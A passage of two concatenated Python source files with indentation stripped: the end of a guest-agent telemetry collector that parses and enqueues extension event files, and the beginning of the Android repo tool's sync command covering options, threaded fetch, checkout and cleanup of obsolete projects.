# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Pick the latest files first, we'll discard older events if len(events) > MAX_EVENT_COUNT
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
try:
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
if not self._event_file_size_allowed(event_file_path):
continue
# We support multiple events in a file, read the file and parse events.
captured_extension_events_count = self._enqueue_events_and_get_count(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except ServiceStoppedError:
# Not logging here as already logged once, re-raising
# Since we already started processing this file, deleting it as we could've already sent some events out
# This is a trade-off between data replication vs data loss.
raise
except Exception as error:
msg = "Failed to process event file {0}: {1}, {2}".format(event_file, ustr(error),
traceback.format_exc())
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
finally:
if dropped_events_with_error_count:
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if not extension_events_directories:
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
if not os.path.exists(event_dir_path):
return
err = None
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as error:
# Only log the first error once per handler per run if unable to clean off residue files
err = ustr(error) if err is None else err
if err is not None:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path, err)
def _enqueue_events_and_get_count(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as event_file_descriptor:
event_data = event_file_descriptor.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file but there can be an instance where the file only has a single
# JSON event and not a list. Handling that condition too
if not isinstance(events, list):
events = [events]
for event in events:
try:
self._send_telemetry_events_handler.enqueue_event(
self._parse_telemetry_event(handler_name, event, event_file_time)
)
captured_events_count += 1
except InvalidExtensionEventError as invalid_error:
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static messages, we will use this to create a dict and emit an event at the
# end of each run to notify if there were any errors parsing events for the extension
dropped_events_with_error_count[ustr(invalid_error)] += 1
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}. Stopping collecting extension events".format(
ustr(stopped_error)))
raise
except Exception as error:
logger.warn("Unable to parse and transmit event, error: {0}".format(error))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return captured_events_count
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite all the common params with extension events params if same
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if not event[message_key]:
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# If all required keys not in event then raise
if required_key not in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
class _CollectAndEnqueueEvents(PeriodicOperation):
"""
Periodic operation to collect telemetry events located in the events folder and enqueue them for the
SendTelemetryHandler thread.
"""
_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
def __init__(self, send_telemetry_events_handler):
super(_CollectAndEnqueueEvents, self).__init__(_CollectAndEnqueueEvents._EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
"""
Periodically send any events located in the events folder
"""
try:
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping iteration.".format(
self._send_telemetry_events_handler.get_thread_name()))
return
self.process_events()
except Exception as error:
err_msg = "Failure in collecting telemetry events: {0}".format(ustr(error))
add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def process_events(self):
"""
Returns a list of events that need to be sent to the telemetry pipeline and deletes the corresponding files
from the events directory.
"""
event_directory_full_path = os.path.join(conf.get_lib_dir(), EVENTS_DIRECTORY)
event_files = os.listdir(event_directory_full_path)
debug_info = CollectOrReportEventDebugInfo(operation=CollectOrReportEventDebugInfo.OP_COLLECT)
for event_file in event_files:
try:
match = EVENT_FILE_REGEX.search(event_file)
if match is None:
continue
event_file_path = os.path.join(event_directory_full_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
with open(event_file_path, "rb") as event_fd:
event_data = event_fd.read().decode("utf-8")
event = parse_event(event_data)
# "legacy" events are events produced by previous versions of the agent (<= 2.2.46) and extensions;
# they do not include all the telemetry fields, so we add them here
is_legacy_event = match.group('agent_event') is None
if is_legacy_event:
# We'll use the file creation time for the event's timestamp
event_file_creation_time_epoch = os.path.getmtime(event_file_path)
event_file_creation_time = datetime.datetime.fromtimestamp(event_file_creation_time_epoch)
if event.is_extension_event():
_CollectAndEnqueueEvents._trim_legacy_extension_event_parameters(event)
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event,
event_file_creation_time)
else:
_CollectAndEnqueueEvents._update_legacy_agent_event(event,
event_file_creation_time)
self._send_telemetry_events_handler.enqueue_event(event)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}, skipping events collection".format(
ustr(stopped_error)))
except UnicodeError as uni_err:
debug_info.update_unicode_error(uni_err)
except Exception as error:
debug_info.update_op_error(error)
debug_info.report_debug_info()
@staticmethod
def _update_legacy_agent_event(event, event_creation_time):
# Ensure that if an agent event is missing a field from the schema defined since 2.2.47, the missing fields
# will be appended, ensuring the event schema is complete before the event is reported.
new_event = TelemetryEvent()
new_event.parameters = []
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(new_event, event_creation_time)
event_params = dict([(param.name, param.value) for param in event.parameters])
new_event_params = dict([(param.name, param.value) for param in new_event.parameters])
missing_params = set(new_event_params.keys()).difference(set(event_params.keys()))
params_to_add = []
for param_name in missing_params:
params_to_add.append(TelemetryEventParam(param_name, new_event_params[param_name]))
event.parameters.extend(params_to_add)
@staticmethod
def _trim_legacy_extension_event_parameters(event):
"""
This method is called for extension events before they are sent out. Per the agreement with extension
publishers, the parameters that belong to extensions and will be reported intact are Name, Version, Operation,
OperationSuccess, Message, and Duration. Since there is nothing preventing extensions to instantiate other
fields (which belong to the agent), we call this method to ensure the rest of the parameters are trimmed since
they will be replaced with values coming from the agent.
:param event: Extension event to trim.
:return: Trimmed extension event; containing only extension-specific parameters.
"""
params_to_keep = dict().fromkeys([
GuestAgentExtensionEventsSchema.Name,
GuestAgentExtensionEventsSchema.Version,
GuestAgentExtensionEventsSchema.Operation,
GuestAgentExtensionEventsSchema.OperationSuccess,
GuestAgentExtensionEventsSchema.Message,
GuestAgentExtensionEventsSchema.Duration
])
trimmed_params = []
for param in event.parameters:
if param.name in params_to_keep:
trimmed_params.append(param)
event.parameters = trimmed_params
class CollectTelemetryEventsHandler(ThreadHandlerInterface):
"""
This Handler takes care of fetching the Extension Telemetry events from the {extension_events_dir} and sends it to
Kusto for advanced debuggability.
"""
_THREAD_NAME = "TelemetryEventsCollector"
def __init__(self, send_telemetry_events_handler):
self.should_run = True
self.thread = None
self._send_telemetry_events_handler = send_telemetry_events_handler
@staticmethod
def get_thread_name():
return CollectTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(CollectTelemetryEventsHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
periodic_operations = [
_CollectAndEnqueueEvents(self._send_telemetry_events_handler)
]
is_etp_enabled = get_supported_feature_by_name(SupportedFeatureNames.ExtensionTelemetryPipeline).is_supported
logger.info("Extension Telemetry pipeline enabled: {0}".format(is_etp_enabled))
if is_etp_enabled:
periodic_operations.append(_ProcessExtensionEvents(self._send_telemetry_events_handler))
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
for periodic_op in periodic_operations:
periodic_op.run()
except Exception as error:
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(error))
finally:
PeriodicOperation.sleep_until_next_operation(periodic_operations)
@staticmethod
def add_common_params_to_telemetry_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time)
|
sync.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
from pyversion import is_python3
if is_python3():
import http.cookiejar as cookielib
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
else:
import cookielib
import imp
import urllib2
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class _CheckoutError(Exception):
"""Internal error thrown in _CheckoutOne() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object direcotry. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
prune=opt.prune,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)' \
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching projects', len(projects),
print_newline=not(opt.quiet),
always_print_percentage=opt.quiet)
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
err_event = _threading.Event()
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.isSet() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target = self._FetchProjectList,
kwargs = kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet() and opt.fail_fast:
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects)
return fetched
def _CheckoutWorker(self, opt, sem, project, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _CheckoutOne.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _CheckoutOne. See the
_CheckoutOne docstring for details.
"""
try:
return self._CheckoutOne(opt, project, *args, **kwargs)
finally:
sem.release()
def _CheckoutOne(self, opt, project, lock, pm, err_event):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
lock: Lock for accessing objects that are shared amongst multiple
_CheckoutWorker() threads.
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Checking out project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
success = syncbuf.Finish()
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot checkout %s' % (project.name),
file=sys.stderr)
raise _CheckoutError()
pm.update()
except _CheckoutError:
pass
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
return success
def _Checkout(self, all_projects, opt):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
"""
# Perform checkouts in multiple threads when we are using partial clone.
# Without partial clone, all needed git objects are already downloaded,
# in this situation it's better to use only one process because the checkout
# would be mostly disk I/O; with partial clone, the objects are only
# downloaded when demanded (at checkout time), which is similar to the
# Sync_NetworkHalf case and parallelism would be helpful.
if self.manifest.CloneFilter:
syncjobs = self.jobs
else:
syncjobs = 1
lock = _threading.Lock()
pm = Progress('Syncing work tree', len(all_projects))
threads = set()
sem = _threading.Semaphore(syncjobs)
err_event = _threading.Event()
for project in all_projects:
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.isSet() and opt.fail_fast:
break
sem.acquire()
if project.worktree:
kwargs = dict(opt=opt,
sem=sem,
project=project,
lock=lock,
pm=pm,
err_event=err_event)
if syncjobs > 1:
t = _threading.Thread(target=self._CheckoutWorker,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._CheckoutWorker(**kwargs)
for t in threads:
t.join()
pm.end()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet():
print('\nerror: Exited sync due to checkout errors', file=sys.stderr)
sys.exit(1)
def _GCProjects(self, projects):
gc_gitdirs = {}
for project in projects:
if len(project.manifest.GetProjectsWithName(project.name)) > 1:
print('Shared project %s found, disabling pruning.' % project.name)
project.bare_git.config('--replace-all', 'gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def _DeleteProject(self, path):
print('Deleting obsolete path %s' % path, file=sys.stderr)
# Delete the .git directory first, so we're less likely to have a partially
# working git repository around. There shouldn't be any git projects here,
# so rmtree works.
try:
platform_utils.rmtree(os.path.join(path, '.git'))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(path, '.git'), str(e)), file=sys.stderr)
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return 1
# Delete everything under the worktree, except for directories that contain
# another git project
dirs_to_remove = []
failed = False
for root, dirs, files in platform_utils.walk(path):
for f in files:
try:
platform_utils.remove(os.path.join(root, f))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, f), str(e)), file=sys.stderr)
failed = True
dirs[:] = [d for d in dirs
if not os.path.lexists(os.path.join(root, d, '.git'))]
dirs_to_remove += [os.path.join(root, d) for d in dirs
if os.path.join(root, d) not in dirs_to_remove]
for d in reversed(dirs_to_remove):
if platform_utils.islink(d):
try:
platform_utils.remove(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
elif len(platform_utils.listdir(d)) == 0:
try:
platform_utils.rmdir(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
continue
if failed:
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return 1
# Try deleting parent dirs if they are empty
project_dir = path
while project_dir != self.manifest.topdir:
if len(platform_utils.listdir(project_dir)) == 0:
platform_utils.rmdir(project_dir)
else:
break
project_dir = os.path.dirname(project_dir)
return 0
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = gitdir,
objdir = gitdir,
